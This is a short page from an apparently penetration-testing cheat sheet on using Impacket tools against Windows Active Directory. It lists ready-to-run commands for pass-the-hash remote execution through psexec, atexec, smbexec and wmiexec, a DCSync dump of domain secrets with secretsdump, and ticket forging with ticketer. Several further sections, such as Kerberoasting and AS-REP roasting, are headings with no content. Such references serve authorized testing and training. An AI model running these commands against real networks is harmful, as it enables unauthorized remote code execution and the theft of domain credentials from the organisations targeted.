search

windowsImpacket

Impacket is a collection of Python classes for working with network protocols.

hashtag
Pass the hash

We can use impacket to pass a (NT:LM) hash to authenticate.

impacket-psexec -hashes :nt [email protected] 
impacket-atexec -hashes :nt [email protected] whoami
impacket-smbexec -hashes :nt [email protected] 
impacket-wmiexec -hashes :nt [email protected]

hashtag
Dcsync attack

If you have a password:

impacket-secretsdump corp.local/incendium:[email protected]

With a cached ticket:

impacket-secretsdump -k -no-pass [email protected] -target-ip 192.168.210.10 -dc-ip 192.168.210.10

hashtag
Generate tickets

To generate the TGS with NTLM

impacket-ticketer -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn>  <user_name>

hashtag
Golden trust cross ticket (child-parent domains in forest)

hashtag
Service ticket

Impacket’s getST.py will request a Service Ticket and save it as ccache.

With credentials:

With cached ticket:

hashtag
Overpass The Hash/Pass The Key (PTK)

hashtag
AS-REP roasting

hashtag
Kerberoasting

PreviousBloodhoundNextBloodyAD

Last updated